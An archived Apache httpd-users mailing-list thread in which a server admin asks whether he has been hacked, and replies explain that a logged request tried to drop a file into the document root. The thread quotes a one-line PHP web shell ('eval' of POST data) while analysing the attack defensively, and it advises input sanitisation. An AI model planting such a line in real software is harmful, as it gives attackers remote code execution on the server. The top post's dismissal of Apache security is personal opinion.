httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Mitchell Krog <mitchellk...@gmail.com>
Subject Re: [users@httpd] am i hacked ?
Date Mon, 06 Feb 2017 17:30:48 GMT
I see these type of attack strings all the time on Nginx except Nginx gives
a 403. Apache is notoriously bad with security and giving 200 ok responses
makes you **** yourself. A reason  I and many other people have switched.
User support on this list was also non existent when I ran into serious SSL
problems with 2.4 that until today have been ignored and unanswered.

On 06 Feb 2017 19:21, "Ken Robinson" <kenrbnsn@rbnsn.com> wrote:

>
>
> On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
>
> The first line is trying to create the file webconfig.txt.php in your
>>> DOCUMENT_ROOT directory, with the contents of the file being:
>>>
>>> <?php eval($_POST[1]);?>
>>>
>>> I didn't decode the remaining lines. I think they're just trying to do
>>> the same
>>> thing.
>>>
>>
>> Fortunately there is no webconfig.txt.php. And all folders in /srv/www
>> belongs to root and user wwwrun
>> is not allowed to write there.
>>
>
> What seems to be happening here is that your system is being probed for
> vulnerabilities.
>
> The attacker is sending a payload string to your index.php file in hopes
> that it will not complain and write the string to the file
> webconfig.txt.php which the attacker would then attempt to get to with the
> real hack in the Posted contents. Are there any requests to get to that
> file?
>
> You should make sure you sanitized any input to your index.php and reject
> anything that's not expected.
>
> Ken
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>

Mime
View raw message